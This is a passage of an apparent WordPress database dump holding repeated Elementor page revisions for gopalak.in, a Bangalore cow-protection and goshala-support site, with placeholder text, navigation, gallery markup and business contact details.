loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Gopalak Values</h1>		\n		<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-11 10:33:26','2022-10-11 05:03:26','',1373,'https://gopalak.in/?p=1610',0,'revision','',0),(1612,1,'2022-10-11 11:43:39','2022-10-11 06:13:39','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"48\" height=\"51\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Group-122-48x51.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Group-122-48x51.png 48w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-285x300.png 285w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-768x808.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-50x53.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Group-122.png 960w\" sizes=\"(max-width: 48px) 100vw, 48px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Gopalak</h2>		\n			<h2>Values</h2>		\n		<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Gopalak Values</h1>		\n		<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-11 11:43:39','2022-10-11 06:13:39','',1373,'https://gopalak.in/?p=1612',0,'revision','',0),(1613,1,'2022-10-11 11:43:39','2022-10-11 06:13:39','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"48\" height=\"51\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Group-122-48x51.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Group-122-48x51.png 48w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-285x300.png 285w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-768x808.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-50x53.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Group-122.png 960w\" sizes=\"(max-width: 48px) 100vw, 48px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Gopalak</h2>		\n			<h2>Values</h2>		\n		<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Gopalak Values</h1>		\n		<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-11 11:43:39','2022-10-11 06:13:39','',1373,'https://gopalak.in/?p=1613',0,'revision','',0),(1614,1,'2022-10-11 11:43:39','2022-10-11 06:13:39','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"48\" height=\"51\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Group-122-48x51.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Group-122-48x51.png 48w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-285x300.png 285w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-768x808.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-50x53.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Group-122.png 960w\" sizes=\"(max-width: 48px) 100vw, 48px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Gopalak</h2>		\n			<h2>Values</h2>		\n		<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg\" title=\"istockphoto-1221688781-612&#215;612\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg\" title=\"istockphoto-1221688781-612&#215;612\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Gopalak Values</h1>		\n		<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-11 11:43:39','2022-10-11 06:13:39','',1373,'https://gopalak.in/?p=1614',0,'revision','',0),(1615,1,'2022-10-11 11:44:32','2022-10-11 06:14:32','','logo1211','','inherit','open','closed','','logo1211','','','2022-10-11 11:44:32','2022-10-11 06:14:32','',1373,'https://gopalak.in/wp-content/uploads/2022/10/logo1211.png',0,'attachment','image/png',0),(1617,1,'2022-10-11 11:45:08','2022-10-11 06:15:08','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"48\" height=\"51\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Group-122-48x51.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Group-122-48x51.png 48w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-285x300.png 285w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-768x808.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-50x53.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Group-122.png 960w\" sizes=\"(max-width: 48px) 100vw, 48px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading 